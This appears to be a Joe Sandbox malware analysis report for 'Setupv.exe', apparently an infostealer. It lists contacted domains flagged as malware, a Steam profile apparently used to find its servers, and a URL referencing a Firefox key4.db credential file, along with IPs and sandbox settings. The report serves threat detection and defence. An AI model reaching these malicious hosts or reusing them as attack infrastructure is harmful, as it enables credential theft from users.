        https://cartograhphy.top/ixau3100%Avira URL Cloudmalware
        http://store.steampowern:0%Avira URL Cloudsafe
        https://biosphxere.digital/100%Avira URL Cloudmalware
        https://geographys.run/m100%Avira URL Cloudmalware
        https://biosphxere.digital/tqoa100%Avira URL Cloudmalware
        https://woodpeckersd.run/glsk100%Avira URL Cloudmalware
        https://toptalentw.top:443/qenal100%Avira URL Cloudmalware
        https://topographky.top/l/100%Avira URL Cloudmalware
        https://toptalentw.top/qena100%Avira URL Cloudmalware
        https://biosphxere.digital:443/tqoa100%Avira URL Cloudmalware
        https://vigorbridgoe.top/banb8100%Avira URL Cloudmalware
        https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPK100%Avira URL Cloudmalware
        https://topographky.top/f.ms1&100%Avira URL Cloudmalware
        transdataa.digital/xwpa100%Avira URL Cloudmalware
        https://topographky.top/xlakoam100%Avira URL Cloudmalware
        https://woodpeckersd.run/100%Avira URL Cloudmalware
        https://tropiscbs.live/S100%Avira URL Cloudmalware
        http://ocsp.sectigo.com0B0%Avira URL Cloudsafe
        https://transdataa.digital/100%Avira URL Cloudmalware
        https://tropiscbs.live/iuwxx100%Avira URL Cloudmalware

        Domains and IPs

        Download Network PCAP: filteredfull

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        steamcommunity.com
        		23.52.218.12
        		truefalse
          		high
          transdataa.digital
          		172.67.182.68
          		truetrue
            		unknown
            toptalentw.top
            		104.21.36.133
            		truefalse
              		high
              pki-goog.l.google.com
              		192.178.49.195
              		truefalse
                		high
                cartograhphy.top
                		unknown
                		unknowntrue
                  		unknown
                  topographky.top
                  		unknown
                  		unknowntrue
                    		unknown
                    woodpeckersd.run
                    		unknown
                    		unknowntrue
                      		unknown
                      tropiscbs.live
                      		unknown
                      		unknownfalse
                        		high
                        biosphxere.digital
                        		unknown
                        		unknowntrue
                          		unknown
                          geographys.run
                          		unknown
                          		unknownfalse
                            		high
                            vigorbridgoe.top
                            		unknown
                            		unknownfalse
                              		high
                              climatologfy.top
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://toptalentw.top/qenafalse
                                • Avira URL Cloud: malware
                                		unknown
                                woodpeckersd.run/glskfalse
                                  		high
                                  tropiscbs.live/iuwxxfalse
                                    		high
                                    topographky.top/xlakfalse
                                      		high
                                      climatologfy.top/kbudfalse
                                        		high
                                        vigorbridgoe.top/banbfalse
                                          		high
                                          https://steamcommunity.com/profiles/76561199845513035false
                                            		high
                                            transdataa.digital/xwpatrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            geographys.run/eirqfalse
                                              		high
                                              biosphxere.digital/tqoafalse
                                                		high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://biosphxere.digital/Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://cartograhphy.top/ixau3Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://player.vimeo.comSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://toptalentw.top:443/qenalSetupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://cartograhphy.top:443/ixauaD(Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://duckduckgo.com/ac/?q=Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#Setupv.exefalse
                                                      		high
                                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Setupv.exefalse
                                                        		high
                                                        https://woodpeckersd.run/glskSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://steamcommunity.com/?subsection=broadcastsSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://biosphxere.digital/tqoaSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://store.steampowern:Setupv.exe, 00000000.00000003.1786932542.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnzSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://topographky.top/l/Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#Setupv.exefalse
                                                              		high
                                                              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://geographys.run/mSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://vigorbridgoe.top/banbSetupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://store.steampowered.com/subscriber_agreement/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.gstatic.cn/recaptcha/Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=SYITZEvy19LV&amp;l=enSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.valvesoftware.com/legal.htmSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&aSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.comSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.comSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=OftCDPJyLyB9&amp;l=english&amSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2SSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://biosphxere.digital:443/tqoaSetupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://vigorbridgoe.top/banb8Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=englSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPKSetupv.exe, 00000000.00000003.1845958800.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1811025242.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://duckduckgo.com/chrome_newtabv209hSetupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://tropiscbs.live/SSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://s.ytimg.com;Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://steam.tv/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://steamcommunity.com/profiles/76561199845513035/badgesSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#Setupv.exefalse
                                                                                                    		high
                                                                                                    https://steamcommunity.com:443/profiles/76561199845513035Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateAccept-EncodSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&amp;Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=6Gx3WA4gUqNSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://store.steampowered.com/privacy_agreement/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://store.steampowered.com/points/shop/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:Setupv.exe, 00000000.00000003.1764855874.0000000003B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://sketchfab.comSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://lv.queniujq.cnSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSetupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.youtube.com/Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://store.steampowered.com/privacy_agreement/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://topographky.top/f.ms1&Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://topographky.top/xlakoamSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                		unknown
                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=engliSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=engliSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://climatologfy.top/kbudSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://s.ytimg.comSetupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://woodpeckersd.run/Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            		unknown
                                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSetupv.exefalse
                                                                                                                                                		high
                                                                                                                                                https://www.google.com/recaptcha/Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://checkout.steampowered.com/Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refSetupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/profiles/76561199845513035/inventory/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://transdataa.digital/Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
                                                                                                                                                            https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&ampSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://gemini.google.com/app?q=Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://store.steampowered.com/;Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://ocsp.sectigo.com0BSetupv.exefalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://store.steampowered.com/about/Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.cloudflare.steamstatic.com/Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/my/wishlist/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://ocsp.sectigo.com0Setupv.exefalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamloopback.hostSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://tropiscbs.live/iuwxxSetupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbbSetupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://help.steampowered.com/en/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/market/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://store.steampowered.com/news/Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiSetupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Nvd4msBzMPzu&ampSetupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high

                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                              Public IPs

                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                              172.67.182.68
                                                                                                                                                                                              		transdataa.digitalUnited States
                                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                                              104.21.36.133
                                                                                                                                                                                              		toptalentw.topUnited States
                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                              23.52.218.12
                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                              		27747TelecentroSAARfalse

                                                                                                                                                                                              General Information

                                                                                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                              Analysis ID:1676533
                                                                                                                                                                                              Start date and time:2025-04-28 19:33:16 +02:00
                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                              Overall analysis duration:0h 3m 48s
                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                              Report type:full
                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                              Number of existing processes analysed:0
